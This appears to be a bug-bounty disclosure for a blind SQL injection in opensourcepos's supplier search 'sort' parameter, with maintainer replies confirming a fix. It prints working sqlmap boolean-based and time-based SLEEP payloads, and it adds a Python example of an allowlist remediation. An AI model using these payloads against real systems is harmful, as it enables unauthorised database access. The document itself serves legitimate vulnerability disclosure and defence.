SQL Injection in opensourcepos/opensourcepos

Valid

Reported on

Aug 26th 2021


✍️ Description

The application is vulnerable to blind SQL injection through the `sort` parameter of the supplier search endpoint.

🕵️‍♂️ Proof of Concept

URL: https://dev.opensourcepos.org/suppliers/search?sort=1
Vulnerable Parameter: sort

SQLMap POC

---
Parameter: sort (GET)
Type: boolean-based blind
Title: Boolean-based blind - Parameter replace (original value)
Payload: sort=(SELECT (CASE WHEN (5937=5937) THEN 1 ELSE (SELECT 4996 UNION SELECT 4231) END))

Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: sort=1 AND (SELECT 3335 FROM (SELECT(SLEEP(5)))uafX)
---
available databases [2]:
[*] information_schema
[*] ospos

💥 Impact

SQL injection attacks are a type of injection attack, in which SQL commands are injected into data-plane input in order to affect the execution of predefined SQL commands. A successful SQL injection attack can result in unauthorized access to sensitive data, such as (hashed) passwords, credit card details, or personal user information.

📍 Location

index.php#L1

📝 References

SQL Injection
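The defect class behind this report is a client-controlled `sort` value reaching the SQL text of an ORDER BY clause. The example below is added here and is not code from the opensourcepos project or its fix commit; it uses a constructed in-memory SQLite table with illustrative column names (an assumption, not the ospos schema). It shows why the tempting fix of binding the sort column as a placeholder does not work (a bound value is a constant, so nothing is sorted) and how an allowlist that maps the numeric sort index to a known column refuses both payloads from the PoC.

```python
import sqlite3

# Constructed sample rows standing in for the ospos suppliers table (assumption;
# the column names are illustrative and not taken from the project's schema).
SUPPLIERS = [("Zenith Co", "Zed"), ("Acme Ltd", "Alice"), ("Mid Corp", "Mona")]

# Allowlist mapping the client's numeric sort index to a real column. Anything
# not present here, including the report's CASE/SLEEP payloads, is refused.
SORTABLE = {"1": "company_name", "2": "agency_name"}
DIRECTIONS = {"asc", "desc"}

def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE suppliers (company_name TEXT, agency_name TEXT)")
    conn.executemany("INSERT INTO suppliers VALUES (?, ?)", SUPPLIERS)
    return conn

def sort_with_placeholder(conn, sort):
    """The tempting but wrong fix: binding the column name as a parameter.
    A bound value is a constant, so ORDER BY ? sorts by a constant and the
    rows come back in table scan (insertion) order, i.e. unsorted."""
    rows = conn.execute("SELECT company_name FROM suppliers ORDER BY ?", (sort,))
    return [r[0] for r in rows]

def validate_sort(sort, direction="asc"):
    """Return (column, direction) if both are on the allowlist, else None."""
    column = SORTABLE.get(str(sort))
    direction = str(direction).lower()
    if column is None or direction not in DIRECTIONS:
        return None
    return column, direction

def sort_safely(conn, sort, direction="asc"):
    """Only allowlisted identifiers reach the SQL text. A search term, if the
    query had one, would still be bound as a placeholder in the WHERE clause."""
    validated = validate_sort(sort, direction)
    if validated is None:
        raise ValueError(f"rejected sort parameter: {sort!r} {direction!r}")
    column, direction = validated
    rows = conn.execute(f"SELECT company_name FROM suppliers ORDER BY {column} {direction}")
    return [r[0] for r in rows]

if __name__ == "__main__":
    db = make_db()
    print(sort_with_placeholder(db, "company_name"))  # ['Zenith Co', 'Acme Ltd', 'Mid Corp']
    print(sort_safely(db, "1"))                       # ['Acme Ltd', 'Mid Corp', 'Zenith Co']
    print(validate_sort("1 AND (SELECT 3335 FROM (SELECT(SLEEP(5)))uafX)"))  # None
```

Logging every rejected value from `validate_sort` gives a cheap detection signal: a legitimate client only ever sends the small set of allowlisted indices.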


Melbin Mathew Antony modified their report
3 months ago
Ziding Zhang
3 months ago

Admin

Hey Melbin, I've just emailed the repo maintainer about this report.

We have contacted a member of the opensourcepos team and are waiting to hear back 3 months ago
jekkos
3 months ago

Maintainer

Fix is in master

jekkos
3 months ago

Maintainer

Thanks for the report.

Melbin
3 months ago

Researcher

Hi, please mark the issue as validated and fixed. Thanks.

jekkos validated this vulnerability 3 months ago
Melbin Mathew Antony has been awarded the disclosure bounty
The fix bounty is now up for grabs
jekkos confirmed that a fix has been merged on b4c48e 3 months ago
jekkos has been awarded the fix bounty